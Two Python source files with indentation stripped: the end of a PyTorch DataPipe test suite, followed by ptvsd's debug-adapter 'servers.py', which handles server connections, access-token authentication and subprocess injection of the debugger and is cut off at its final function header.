filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_args=(5, ))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_kwargs={'val': 5, 'clip': True})
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
def test_filter_datapipe_nested_list(self):
input_ds = IDP(range(10)).batch(5)
def _filter_fn(data, val):
return data >= val
filter_dp = input_ds.filter(nesting_level=-1, filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp1 = [[5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp1))
for data, exp in zip(filter_dp, expected_dp1):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(nesting_level=-1, drop_empty_batches=False,
filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp2: List[List[int]] = [[], [5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp2))
for data, exp in zip(filter_dp, expected_dp2):
self.assertEqual(data, exp)
with self.assertRaises(IndexError):
filter_dp = input_ds.filter(nesting_level=5, filter_fn=_filter_fn, fn_kwargs={'val': 5})
temp = list(filter_dp)
input_ds = IDP(range(10)).batch(3)
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3)
expected_dp3: List[List[int]] = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
self.assertEqual(len(list(filter_dp)), len(expected_dp3))
for data, exp in zip(filter_dp, expected_dp3):
self.assertEqual(data, exp)
input_ds = IDP([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 3, nesting_level=-1)
expected_dp4 = [[[4, 5]], [[6, 7, 8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp4))
for data2, exp2 in zip(filter_dp, expected_dp4):
self.assertEqual(data2, exp2)
input_ds = IDP([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 7, nesting_level=-1)
expected_dp5 = [[[8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp5))
for data2, exp2 in zip(filter_dp, expected_dp5):
self.assertEqual(data2, exp2)
input_ds = IDP([[[0, 1], [3, 4]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3, nesting_level=1)
expected_dp6 = [[[6, 7, 8], [1, 2, 3]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp6))
for data2, exp2 in zip(filter_dp, expected_dp6):
self.assertEqual(data2, exp2)
def test_sampler_datapipe(self):
input_dp = IDP(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
def test_shuffle_datapipe(self):
exp = list(range(20))
input_ds = IDP(exp)
with self.assertRaises(AssertionError):
shuffle_dp = input_ds.shuffle(buffer_size=0)
for bs in (5, 20, 25):
shuffle_dp = input_ds.shuffle(buffer_size=bs)
self.assertEqual(len(shuffle_dp), len(input_ds))
random.seed(123)
res = list(shuffle_dp)
self.assertEqual(sorted(res), exp)
# Test Deterministic
for num_workers in (0, 1):
random.seed(123)
dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn)
dl_res = list(dl)
self.assertEqual(res, dl_res)
shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(IDP(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(IDP(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(IDP(range(10)), IDP(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, MDP(arr), (), {}),
(dp.map.Mapper, MDP(arr), (_fake_fn, (0,), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, MDP(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_concat_datapipe(self):
input_dp1 = MDP(range(10))
input_dp2 = MDP(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_map_datapipe(self):
arr = range(10)
input_dp = MDP(arr)
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
)
map_dp = input_dp.map(fn=fn, fn_args=(torch.int,), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
def test_mux_datapipe(self):
# Test Case: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = IDP(range(4))
input_dp2 = IDP(range(4, 8))
input_dp3 = IDP(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Test Case: Uneven input Data Pipes
input_dp1 = IDP([1, 2, 3, 4])
input_dp2 = IDP([10])
input_dp3 = IDP([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Test Case: Empty Data Pipe
input_dp1 = IDP([0, 1, 2, 3])
input_dp2 = IDP([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# Test Case: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = IDP(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
class InvalidData(Generic[T_co], NamedTuple):
name: str
data: T_co
class TestTyping(TestCase):
def test_subtype(self):
from torch.utils.data._typing import issubtype
basic_type = (int, str, bool, float, complex,
list, tuple, dict, set, T_co)
for t in basic_type:
self.assertTrue(issubtype(t, t))
self.assertTrue(issubtype(t, Any))
if t == T_co:
self.assertTrue(issubtype(Any, t))
else:
self.assertFalse(issubtype(Any, t))
for t1, t2 in itertools.product(basic_type, basic_type):
if t1 == t2 or t2 == T_co:
self.assertTrue(issubtype(t1, t2))
else:
self.assertFalse(issubtype(t1, t2))
T = TypeVar('T', int, str)
S = TypeVar('S', bool, Union[str, int], Tuple[int, T]) # type: ignore[valid-type]
types = ((int, Optional[int]),
(List, Union[int, list]),
(Tuple[int, str], S),
(Tuple[int, str], tuple),
(T, S),
(S, T_co),
(T, Union[S, Set]))
for sub, par in types:
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
subscriptable_types = {
List: 1,
Tuple: 2, # use 2 parameters
Set: 1,
Dict: 2,
}
for subscript_type, n in subscriptable_types.items():
for ts in itertools.combinations(types, n):
subs, pars = zip(*ts)
sub = subscript_type[subs] # type: ignore[index]
par = subscript_type[pars] # type: ignore[index]
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
# Non-recursive check
self.assertTrue(issubtype(par, sub, recursive=False))
def test_issubinstance(self):
from torch.utils.data._typing import issubinstance
basic_data = (1, '1', True, 1., complex(1., 0.))
basic_type = (int, str, bool, float, complex)
S = TypeVar('S', bool, Union[str, int])
for d in basic_data:
self.assertTrue(issubinstance(d, Any))
self.assertTrue(issubinstance(d, T_co))
if type(d) in (bool, int, str):
self.assertTrue(issubinstance(d, S))
else:
self.assertFalse(issubinstance(d, S))
for t in basic_type:
if type(d) == t:
self.assertTrue(issubinstance(d, t))
else:
self.assertFalse(issubinstance(d, t))
# list/set
dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
for d, t in dt:
self.assertTrue(issubinstance(d, t))
self.assertTrue(issubinstance(d, t[T_co])) # type: ignore[index]
self.assertFalse(issubinstance(d, t[int])) # type: ignore[index]
# dict
d = dict({'1': 1, '2': 2.})
self.assertTrue(issubinstance(d, Dict))
self.assertTrue(issubinstance(d, Dict[str, T_co]))
self.assertFalse(issubinstance(d, Dict[str, int]))
# tuple
d = (1, '1', 2)
self.assertTrue(issubinstance(d, Tuple))
self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
self.assertFalse(issubinstance(d, Tuple[int, Any]))
self.assertFalse(issubinstance(d, Tuple[int, int, int]))
# Static checking annotation
def test_compile_time(self):
with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
class InvalidDP1(IterDataPipe[int]):
def __iter__(self) -> str: # type: ignore[misc, override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP2(IterDataPipe[Tuple]):
def __iter__(self) -> Iterator[int]: # type: ignore[override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP3(IterDataPipe[Tuple[int, str]]):
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
if _generic_namedtuple_allowed:
with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
class InvalidDP4(IterDataPipe["InvalidData[int]"]): # type: ignore[type-arg, misc]
pass
class DP1(IterDataPipe[Tuple[int, str]]):
def __init__(self, length):
self.length = length
def __iter__(self) -> Iterator[Tuple[int, str]]:
for d in range(self.length):
yield d, str(d)
self.assertTrue(issubclass(DP1, IterDataPipe))
dp1 = DP1(10)
self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
dp2 = DP1(5)
self.assertEqual(dp1.type, dp2.type)
with self.assertRaisesRegex(TypeError, r"is not a generic class"):
class InvalidDP5(DP1[tuple]): # type: ignore[type-arg]
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
class DP2(IterDataPipe[T_co]):
def __iter__(self) -> Iterator[T_co]:
for d in range(10):
yield d # type: ignore[misc]
self.assertTrue(issubclass(DP2, IterDataPipe))
dp1 = DP2() # type: ignore[assignment]
self.assertTrue(DP2.type.issubtype(dp1.type) and dp1.type.issubtype(DP2.type))
dp2 = DP2() # type: ignore[assignment]
self.assertEqual(dp1.type, dp2.type)
class DP3(IterDataPipe[Tuple[T_co, str]]):
r""" DataPipe without fixed type with __init__ function"""
def __init__(self, datasource):
self.datasource = datasource
def __iter__(self) -> Iterator[Tuple[T_co, str]]:
for d in self.datasource:
yield d, str(d)
self.assertTrue(issubclass(DP3, IterDataPipe))
dp1 = DP3(range(10)) # type: ignore[assignment]
self.assertTrue(DP3.type.issubtype(dp1.type) and dp1.type.issubtype(DP3.type))
dp2 = DP3(5) # type: ignore[assignment]
self.assertEqual(dp1.type, dp2.type)
class DP4(IterDataPipe[tuple]):
r""" DataPipe without __iter__ annotation"""
def __iter__(self):
raise NotImplementedError
self.assertTrue(issubclass(DP4, IterDataPipe))
dp = DP4()
self.assertTrue(dp.type.param == tuple)
class DP5(IterDataPipe):
r""" DataPipe without type annotation"""
def __iter__(self) -> Iterator[str]:
raise NotImplementedError
self.assertTrue(issubclass(DP5, IterDataPipe))
dp = DP5() # type: ignore[assignment]
from torch.utils.data._typing import issubtype
self.assertTrue(issubtype(dp.type.param, Any) and issubtype(Any, dp.type.param))
class DP6(IterDataPipe[int]):
r""" DataPipe with plain Iterator"""
def __iter__(self) -> Iterator:
raise NotImplementedError
self.assertTrue(issubclass(DP6, IterDataPipe))
dp = DP6() # type: ignore[assignment]
self.assertTrue(dp.type.param == int)
class DP7(IterDataPipe[Awaitable[T_co]]):
r""" DataPipe with abstract base class"""
self.assertTrue(issubclass(DP6, IterDataPipe))
self.assertTrue(DP7.type.param == Awaitable[T_co])
class DP8(DP7[str]):
r""" DataPipe subclass from a DataPipe with abc type"""
self.assertTrue(issubclass(DP8, IterDataPipe))
self.assertTrue(DP8.type.param == Awaitable[str])
def test_construct_time(self):
class DP0(IterDataPipe[Tuple]):
@argument_validation
def __init__(self, dp: IterDataPipe):
self.dp = dp
def __iter__(self) -> Iterator[Tuple]:
for d in self.dp:
yield d, str(d)
class DP1(IterDataPipe[int]):
@argument_validation
def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
self.dp = dp
def __iter__(self) -> Iterator[int]:
for a, b in self.dp:
yield a
# Non-DataPipe input with DataPipe hint
datasource = [(1, '1'), (2, '2'), (3, '3')]
with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
dp = DP0(datasource)
dp = DP0(IDP(range(10)))
with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
dp = DP1(dp)
def test_runtime(self):
class DP(IterDataPipe[Tuple[int, T_co]]):
def __init__(self, datasource):
self.ds = datasource
@runtime_validation
def __iter__(self) -> Iterator[Tuple[int, T_co]]:
for d in self.ds:
yield d
dss = ([(1, '1'), (2, '2')],
[(1, 1), (2, '2')])
for ds in dss:
dp = DP(ds) # type: ignore[var-annotated]
self.assertEqual(list(dp), ds)
# Reset __iter__
self.assertEqual(list(dp), ds)
dss = ([(1, 1), ('2', 2)], # type: ignore[assignment, list-item]
[[1, '1'], [2, '2']], # type: ignore[list-item]
[1, '1', 2, '2'])
for ds in dss:
dp = DP(ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
with runtime_validation_disabled():
self.assertEqual(list(dp), ds)
with runtime_validation_disabled():
self.assertEqual(list(dp), ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
def test_reinforce(self):
T = TypeVar('T', int, str)
class DP(IterDataPipe[T]):
def __init__(self, ds):
self.ds = ds
@runtime_validation
def __iter__(self) -> Iterator[T]:
for d in self.ds:
yield d
ds = list(range(10))
# Valid type reinforcement
dp = DP(ds).reinforce_type(int)
self.assertTrue(dp.type, int)
self.assertEqual(list(dp), ds)
# Invalid type
with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
dp = DP(ds).reinforce_type(1)
# Type is not subtype
with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
dp = DP(ds).reinforce_type(float)
# Invalid data at runtime
dp = DP(ds).reinforce_type(str)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp)
# Context Manager to disable the runtime validation
with runtime_validation_disabled():
self.assertEqual(list(d for d in dp), ds)
class NumbersDataset(IterDataPipe):
def __init__(self, size=10):
self.size = size
def __iter__(self):
for i in range(self.size):
yield i
class TestGraph(TestCase):
@skipIfNoDill
def test_simple_traverse(self):
numbers_dp = NumbersDataset(size=50)
mapped_dp = numbers_dp.map(lambda x: x * 10)
graph = torch.utils.data.graph.traverse(mapped_dp)
expected: Dict[Any, Any] = {mapped_dp: {numbers_dp: {}}}
self.assertEqual(expected, graph)
@skipIfNoDill
def test_traverse_forked(self):
numbers_dp = NumbersDataset(size=50)
dp0, dp1, dp2 = numbers_dp.fork(num_instances=3)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd, dp2)
graph = torch.utils.data.graph.traverse(combined_dp)
expected = {combined_dp: {dp0_upd: {dp0: {dp0.main_datapipe: {dp0.main_datapipe.main_datapipe: {}}}},
dp1_upd: {dp1: {dp1.main_datapipe: {dp1.main_datapipe.main_datapipe: {}}}},
dp2: {dp2.main_datapipe: {dp2.main_datapipe.main_datapipe: {}}}}}
self.assertEqual(expected, graph)
class TestSharding(TestCase):
def _get_pipeline(self):
numbers_dp = NumbersDataset(size=10)
dp0, dp1 = numbers_dp.fork(num_instances=2)
dp0_upd = dp0.map(lambda x: x * 10)
dp1_upd = dp1.filter(lambda x: x % 3 == 1)
combined_dp = dp0_upd.mux(dp1_upd)
return combined_dp
@skipIfNoDill
def test_simple_sharding(self):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, 1)
items = list(sharded_dp)
self.assertEqual([1, 20, 40, 70], items)
all_items = list(self._get_pipeline())
items = []
for i in range(3):
sharded_dp = self._get_pipeline().sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp, 3, i)
items += list(sharded_dp)
self.assertEqual(sorted(all_items), sorted(items))
def test_sharding_length(self):
numbers_dp = IDP(range(13))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 3, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 3, 1)
sharded_dp2 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp2, 3, 2)
self.assertEqual(13, len(numbers_dp))
self.assertEqual(5, len(sharded_dp0))
self.assertEqual(4, len(sharded_dp1))
self.assertEqual(4, len(sharded_dp2))
numbers_dp = IDP(range(1))
sharded_dp0 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp0, 2, 0)
sharded_dp1 = numbers_dp.sharding_filter()
torch.utils.data.sharding.apply_sharding(sharded_dp1, 2, 1)
self.assertEqual(1, len(sharded_dp0))
self.assertEqual(0, len(sharded_dp1))
@skipIfNoDill
def test_old_dataloader(self):
dp = self._get_pipeline()
expected = list(dp)
dp = self._get_pipeline().sharding_filter()
dl = DataLoader(dp, batch_size=1, shuffle=False, num_workers=2,
worker_init_fn=torch.utils.data.backward_compatibility.worker_init_fn)
items = []
for i in dl:
items.append(i)
self.assertEqual(sorted(expected), sorted(items))
if __name__ == '__main__':
run_tests()
|
servers.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import functools
import os
import subprocess
import sys
import threading
import time
import ptvsd
from ptvsd import adapter
from ptvsd.common import compat, fmt, json, log, messaging, sockets
from ptvsd.adapter import components
access_token = None
"""Access token used to authenticate with the servers."""
_lock = threading.RLock()
_connections = []
"""All servers that are connected to this adapter, in order in which they connected.
"""
_connections_changed = threading.Event()
class Connection(sockets.ClientConnection):
"""A debug server that is connected to the adapter.
Servers that are not participating in a debug session are managed directly by the
corresponding Connection instance.
Servers that are participating in a debug session are managed by that sessions's
Server component instance, but Connection object remains, and takes over again
once the session ends.
"""
def __init__(self, sock):
from ptvsd.adapter import sessions
self.disconnected = False
self.server = None
"""The Server component, if this debug server belongs to Session.
"""
self.pid = None
stream = messaging.JsonIOStream.from_socket(sock, str(self))
self.channel = messaging.JsonMessageChannel(stream, self)
self.channel.start()
try:
self.authenticate()
info = self.channel.request("pydevdSystemInfo")
process_info = info("process", json.object())
self.pid = process_info("pid", int)
self.ppid = process_info("ppid", int, optional=True)
if self.ppid == ():
self.ppid = None
self.channel.name = stream.name = str(self)
ptvsd_dir = os.path.dirname(os.path.dirname(ptvsd.__file__))
# Note: we must check if 'ptvsd' is not already in sys.modules because the
# evaluation of an import at the wrong time could deadlock Python due to
# its import lock.
#
# So, in general this evaluation shouldn't do anything. It's only
# important when pydevd attaches automatically to a subprocess. In this
# case, we have to make sure that ptvsd is properly put back in the game
# for users to be able to use it.v
#
# In this case (when the import is needed), this evaluation *must* be done
# before the configurationDone request is sent -- if this is not respected
# it's possible that pydevd already started secondary threads to handle
# commands, in which case it's very likely that this command would be
# evaluated at the wrong thread and the import could potentially deadlock
# the program.
#
# Note 2: the sys module is guaranteed to be in the frame globals and
# doesn't need to be imported.
inject_ptvsd = """
if 'ptvsd' not in sys.modules:
sys.path.insert(0, {ptvsd_dir!r})
try:
import ptvsd
finally:
del sys.path[0]
"""
inject_ptvsd = fmt(inject_ptvsd, ptvsd_dir=ptvsd_dir)
try:
self.channel.request("evaluate", {"expression": inject_ptvsd})
except messaging.MessageHandlingError:
# Failure to inject is not a fatal error - such a subprocess can
# still be debugged, it just won't support "import ptvsd" in user
# code - so don't terminate the session.
log.exception("Failed to inject ptvsd into {0}:", self, level="warning")
with _lock:
# The server can disconnect concurrently before we get here, e.g. if
# it was force-killed. If the disconnect() handler has already run,
# don't register this server or report it, since there's nothing to
# deregister it.
if self.disconnected:
return
if any(conn.pid == self.pid for conn in _connections):
raise KeyError(
fmt("{0} is already connected to this adapter", self)
)
_connections.append(self)
_connections_changed.set()
except Exception:
log.exception("Failed to accept incoming server connection:")
self.channel.close()
# If this was the first server to connect, and the main thread is inside
# wait_until_disconnected(), we want to unblock it and allow it to exit.
dont_wait_for_first_connection()
# If we couldn't retrieve all the necessary info from the debug server,
# or there's a PID clash, we don't want to track this debuggee anymore,
# but we want to continue accepting connections.
return
parent_session = sessions.get(self.ppid)
if parent_session is None:
log.info("No active debug session for parent process of {0}.", self)
else:
try:
parent_session.ide.notify_of_subprocess(self)
except Exception:
# This might fail if the IDE concurrently disconnects from the parent
# session. We still want to keep the connection around, in case the
# IDE reconnects later. If the parent session was "launch", it'll take
# care of closing the remaining server connections.
log.exception("Failed to notify parent session about {0}:", self)
def __str__(self):
return "Server" + fmt("[?]" if self.pid is None else "[pid={0}]", self.pid)
def authenticate(self):
if access_token is None and adapter.access_token is None:
return
auth = self.channel.request(
"pydevdAuthorize", {"debugServerAccessToken": access_token}
)
if auth["clientAccessToken"] != adapter.access_token:
self.channel.close()
raise RuntimeError('Mismatched "clientAccessToken"; server not authorized.')
def request(self, request):
raise request.isnt_valid(
"Requests from the debug server to the IDE are not allowed."
)
def event(self, event):
pass
def terminated_event(self, event):
self.channel.close()
def disconnect(self):
with _lock:
self.disconnected = True
if self.server is not None:
# If the disconnect happened while Server was being instantiated,
# we need to tell it, so that it can clean up via Session.finalize().
# It will also take care of deregistering the connection in that case.
self.server.disconnect()
elif self in _connections:
_connections.remove(self)
_connections_changed.set()
def attach_to_session(self, session):
"""Attaches this server to the specified Session as a Server component.
Raises ValueError if the server already belongs to some session.
"""
with _lock:
if self.server is not None:
raise ValueError
log.info("Attaching {0} to {1}", self, session)
self.server = Server(session, self)
class Server(components.Component):
"""Handles the debug server side of a debug session."""
message_handler = components.Component.message_handler
class Capabilities(components.Capabilities):
PROPERTIES = {
"supportsCompletionsRequest": False,
"supportsConditionalBreakpoints": False,
"supportsConfigurationDoneRequest": False,
"supportsDataBreakpoints": False,
"supportsDelayedStackTraceLoading": False,
"supportsDisassembleRequest": False,
"supportsEvaluateForHovers": False,
"supportsExceptionInfoRequest": False,
"supportsExceptionOptions": False,
"supportsFunctionBreakpoints": False,
"supportsGotoTargetsRequest": False,
"supportsHitConditionalBreakpoints": False,
"supportsLoadedSourcesRequest": False,
"supportsLogPoints": False,
"supportsModulesRequest": False,
"supportsReadMemoryRequest": False,
"supportsRestartFrame": False,
"supportsRestartRequest": False,
"supportsSetExpression": False,
"supportsSetVariable": False,
"supportsStepBack": False,
"supportsStepInTargetsRequest": False,
"supportsTerminateDebuggee": False,
"supportsTerminateRequest": False,
"supportsTerminateThreadsRequest": False,
"supportsValueFormattingOptions": False,
"exceptionBreakpointFilters": [],
"additionalModuleColumns": [],
"supportedChecksumAlgorithms": [],
}
def __init__(self, session, connection):
assert connection.server is None
with session:
assert not session.server
super(Server, self).__init__(session, channel=connection.channel)
self.connection = connection
assert self.session.pid is None
if self.session.launcher and self.session.launcher.pid != self.pid:
log.info(
"Launcher reported PID={0}, but server reported PID={1}",
self.session.launcher.pid,
self.pid,
)
self.session.pid = self.pid
session.server = self
@property
def pid(self):
"""Process ID of the debuggee process, as reported by the server."""
return self.connection.pid
@property
def ppid(self):
"""Parent process ID of the debuggee process, as reported by the server."""
return self.connection.ppid
def initialize(self, request):
assert request.is_request("initialize")
self.connection.authenticate()
request = self.channel.propagate(request)
request.wait_for_response()
self.capabilities = self.Capabilities(self, request.response)
# Generic request handler, used if there's no specific handler below.
@message_handler
def request(self, request):
# Do not delegate requests from the server by default. There is a security
# boundary between the server and the adapter, and we cannot trust arbitrary
# requests sent over that boundary, since they may contain arbitrary code
# that the IDE will execute - e.g. "runInTerminal". The adapter must only
# propagate requests that it knows are safe.
raise request.isnt_valid(
"Requests from the debug server to the IDE are not allowed."
)
# Generic event handler, used if there's no specific handler below.
@message_handler
def event(self, event):
self.ide.propagate_after_start(event)
@message_handler
def initialized_event(self, event):
# pydevd doesn't send it, but the adapter will send its own in any case.
pass
@message_handler
def process_event(self, event):
# If there is a launcher, it's handling the process event.
if not self.launcher:
self.ide.propagate_after_start(event)
@message_handler
def continued_event(self, event):
# https://github.com/microsoft/ptvsd/issues/1530
#
# DAP specification says that a step request implies that only the thread on
# which that step occurred is resumed for the duration of the step. However,
# for VS compatibility, pydevd can operate in a mode that resumes all threads
# instead. This is set according to the value of "steppingResumesAllThreads"
# in "launch" or "attach" request, which defaults to true. If explicitly set
# to false, pydevd will only resume the thread that was stepping.
#
# To ensure that the IDE is aware that other threads are getting resumed in
# that mode, pydevd sends a "continued" event with "allThreadsResumed": true.
# when responding to a step request. This ensures correct behavior in VSCode
# and other DAP-conformant clients.
#
# On the other hand, VS does not follow the DAP specification in this regard.
# When it requests a step, it assumes that all threads will be resumed, and
# does not expect to see "continued" events explicitly reflecting that fact.
# If such events are sent regardless, VS behaves erratically. Thus, we have
# to suppress them specifically for VS.
if self.ide.client_id not in ("visualstudio", "vsformac"):
self.ide.propagate_after_start(event)
@message_handler
def exited_event(self, event):
# If there is a launcher, it's handling the exit code.
if not self.launcher:
self.ide.propagate_after_start(event)
@message_handler
def terminated_event(self, event):
# Do not propagate this, since we'll report our own.
self.channel.close()
def detach_from_session(self):
with _lock:
self.is_connected = False
self.channel.handlers = self.connection
self.channel.name = self.channel.stream.name = str(self.connection)
self.connection.server = None
def disconnect(self):
with _lock:
_connections.remove(self.connection)
_connections_changed.set()
super(Server, self).disconnect()
listen = functools.partial(Connection.listen, name="Server")
def stop_listening():
try:
Connection.listener.close()
except Exception:
log.exception(level="warning")
def connections():
with _lock:
return list(_connections)
def wait_for_connection(session, predicate, timeout=None):
"""Waits until there is a server with the specified PID connected to this adapter,
and returns the corresponding Connection.
If there is more than one server connection already available, returns the oldest
one.
"""
def wait_for_timeout():
time.sleep(timeout)
wait_for_timeout.timed_out = True
with _lock:
_connections_changed.set()
wait_for_timeout.timed_out = timeout == 0
if timeout:
thread = threading.Thread(
target=wait_for_timeout, name="servers.wait_for_connection() timeout"
)
thread.daemon = True
thread.start()
if timeout != 0:
log.info("{0} waiting for connection from debug server...", session)
while True:
with _lock:
_connections_changed.clear()
conns = (conn for conn in _connections if predicate(conn))
conn = next(conns, None)
if conn is not None or wait_for_timeout.timed_out:
return conn
_connections_changed.wait()
def wait_until_disconnected():
"""Blocks until all debug servers disconnect from the adapter.
If there are no server connections, waits until at least one is established first,
before waiting for it to disconnect.
"""
while True:
_connections_changed.wait()
with _lock:
_connections_changed.clear()
if not len(_connections):
return
def dont_wait_for_first_connection():
"""Unblocks any pending wait_until_disconnected() call that is waiting on the
first server to connect.
"""
with _lock:
_connections_changed.set()
def inject(pid, ptvsd_args):
